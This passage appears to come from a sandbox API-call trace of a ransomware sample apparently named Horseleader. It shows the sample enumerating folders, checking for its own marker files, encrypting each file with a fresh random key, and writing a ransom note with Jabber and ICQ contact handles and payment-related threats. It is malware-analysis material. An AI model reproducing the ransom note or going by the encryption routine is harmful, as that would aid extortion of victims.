returned 1 [0251.580] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.580] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.581] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70b300e1, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70b300e1, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1964f3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.581] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.581] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_SelectionSubpicture.png") returned 101 [0251.581] StrStrIW (lpFirst="NavigationRight_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.581] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.581] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.581] lstrlenW (lpString=".testttjffg") returned 11 [0251.581] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.581] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.581] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.581] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.582] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70ae3e27, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70ae3e27, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1964f3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.582] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.582] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_ButtonGraphic.png") returned 92 [0251.582] StrStrIW (lpFirst="NavigationUp_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.582] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.582] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.582] lstrlenW (lpString=".testttjffg") returned 11 [0251.582] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.583] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.583] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.583] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.584] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70b5623e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70b5623e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1964f3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.584] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.584] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_SelectionSubpicture.png") returned 98 [0251.584] StrStrIW (lpFirst="NavigationUp_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.584] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.584] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.584] lstrlenW (lpString=".testttjffg") returned 11 [0251.584] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.585] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.585] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.585] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.590] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70b5623e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70b5623e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1964f3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 0 [0251.590] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.591] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\#Decrypt#.txt") returned 75 [0251.591] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.592] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0251.593] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.594] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0251.594] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.594] CloseHandle (hObject=0x158) returned 1 [0251.594] GetProcessHeap () returned 0x780000 [0251.594] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.594] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9fbd8be5, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaab41c3c, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9fdc8b88, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Memories", cAlternateFileName="")) returned 1 [0251.596] lstrcmpiW (lpString1="Memories", lpString2="Windows") returned -1 [0251.596] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories") returned 56 [0251.596] lstrcmpW (lpString1="Memories", lpString2=".") returned 1 [0251.596] lstrcmpW (lpString1="Memories", lpString2="..") returned 1 [0251.596] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.596] GetProcessHeap () returned 0x780000 [0251.596] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0251.596] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\*") returned 58 [0251.596] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9fbd8be5, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaab41c3c, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9fdc8b88, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.598] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.599] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\.") returned 58 [0251.599] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.599] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9fbd8be5, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaab41c3c, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9fdc8b88, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="..", cAlternateFileName="")) returned 1 [0251.599] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.599] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\..") returned 59 [0251.599] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.599] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.599] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x710d74af, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x710d74af, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1964f3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb08f, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="16_9-frame-background.png", cAlternateFileName="")) returned 1 [0251.599] lstrcmpiW (lpString1="16_9-frame-background.png", lpString2="Windows") returned -1 [0251.599] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-background.png") returned 82 [0251.599] StrStrIW (lpFirst="16_9-frame-background.png", lpSrch=".horseleader") returned 0x0 [0251.599] lstrcmpW (lpString1="16_9-frame-background.png", lpString2="#Decrypt#.txt") returned 1 [0251.599] lstrcmpW (lpString1="16_9-frame-background.png", lpString2="_uninstalling_.png") returned 1 [0251.599] lstrlenW (lpString=".testttjffg") returned 11 [0251.599] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-background.png", lpSrch=".testttjffg") returned 0x0 [0251.599] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.599] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.599] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\16_9-frame-background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.600] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x710fd60c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x710fd60c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1bc651, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc32, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="16_9-frame-highlight.png", cAlternateFileName="")) returned 1 [0251.600] lstrcmpiW (lpString1="16_9-frame-highlight.png", lpString2="Windows") returned -1 [0251.600] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-highlight.png") returned 81 [0251.601] StrStrIW (lpFirst="16_9-frame-highlight.png", lpSrch=".horseleader") returned 0x0 [0251.601] lstrcmpW (lpString1="16_9-frame-highlight.png", lpString2="#Decrypt#.txt") returned 1 [0251.601] lstrcmpW (lpString1="16_9-frame-highlight.png", lpString2="_uninstalling_.png") returned 1 [0251.601] lstrlenW (lpString=".testttjffg") returned 11 [0251.601] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-highlight.png", lpSrch=".testttjffg") returned 0x0 [0251.601] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.601] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.601] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\16_9-frame-highlight.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.601] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71123769, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71123769, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1bc651, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x578, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="16_9-frame-image-mask.png", cAlternateFileName="")) returned 1 [0251.601] lstrcmpiW (lpString1="16_9-frame-image-mask.png", lpString2="Windows") returned -1 [0251.601] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-image-mask.png") returned 82 [0251.601] StrStrIW (lpFirst="16_9-frame-image-mask.png", lpSrch=".horseleader") returned 0x0 [0251.601] lstrcmpW (lpString1="16_9-frame-image-mask.png", lpString2="#Decrypt#.txt") returned 1 [0251.601] lstrcmpW (lpString1="16_9-frame-image-mask.png", lpString2="_uninstalling_.png") returned 1 [0251.601] lstrlenW (lpString=".testttjffg") returned 11 [0251.601] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-image-mask.png", lpSrch=".testttjffg") returned 0x0 [0251.602] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.602] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.602] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-image-mask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\16_9-frame-image-mask.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.602] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x711498c6, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x711498c6, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1bc651, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x8c12, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="16_9-frame-overlay.png", cAlternateFileName="")) returned 1 [0251.602] lstrcmpiW (lpString1="16_9-frame-overlay.png", lpString2="Windows") returned -1 [0251.602] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-overlay.png") returned 79 [0251.602] StrStrIW (lpFirst="16_9-frame-overlay.png", lpSrch=".horseleader") returned 0x0 [0251.602] lstrcmpW (lpString1="16_9-frame-overlay.png", lpString2="#Decrypt#.txt") returned 1 [0251.602] lstrcmpW (lpString1="16_9-frame-overlay.png", lpString2="_uninstalling_.png") returned 1 [0251.602] lstrlenW (lpString=".testttjffg") returned 11 [0251.602] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-overlay.png", lpSrch=".testttjffg") returned 0x0 [0251.603] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.603] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.603] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-overlay.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\16_9-frame-overlay.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.603] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71254251, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71254251, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1bc651, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2f993, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="background.png", cAlternateFileName="")) returned 1 [0251.603] lstrcmpiW (lpString1="background.png", lpString2="Windows") returned -1 [0251.603] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\background.png") returned 71 [0251.603] StrStrIW (lpFirst="background.png", lpSrch=".horseleader") returned 0x0 [0251.603] lstrcmpW (lpString1="background.png", lpString2="#Decrypt#.txt") returned 1 [0251.603] lstrcmpW (lpString1="background.png", lpString2="_uninstalling_.png") returned 1 [0251.603] lstrlenW (lpString=".testttjffg") returned 11 [0251.603] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\background.png", lpSrch=".testttjffg") returned 0x0 [0251.603] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.604] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.604] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\background.png" 